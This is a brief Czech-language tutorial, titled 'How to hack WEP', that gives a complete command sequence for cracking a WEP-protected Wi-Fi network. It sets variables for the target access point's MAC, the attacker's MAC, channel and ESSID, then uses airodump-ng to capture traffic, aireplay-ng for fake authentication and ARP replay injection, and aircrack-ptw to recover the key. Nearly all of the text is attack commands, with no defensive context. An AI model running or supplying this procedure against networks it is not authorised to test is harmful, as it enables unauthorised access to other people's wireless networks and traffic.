Obsah

Jak hacknout WEP

Vstupni predpoklady

Konvence

export APMAC="00:12:0E:XX:XX:XX"
export MYMAC="00:02:2D:XX:XX:XX"
export CHANNEL="7"
export ESSID="doma"

Postup

Terminal 0

/usr/local/bin/wlanconfig ath0 destroy
/usr/local/bin/wlanconfig ath0 create wlandev wifi0 wlanmode monitor
airodump-ng ath0
airodump-ng --bssid $APMAC --channel $CHANNEL --write doma ath0

Terminal 1

aireplay-ng -a $APMAC -h $MYMAC -e "$ESSID" --fakeauth 0 ath0

Terminal 2

aireplay-ng --arpreplay -b $APMAC -h $MYMAC ath0

Terminal 3

aircrack-ptw $ESSID-01.cap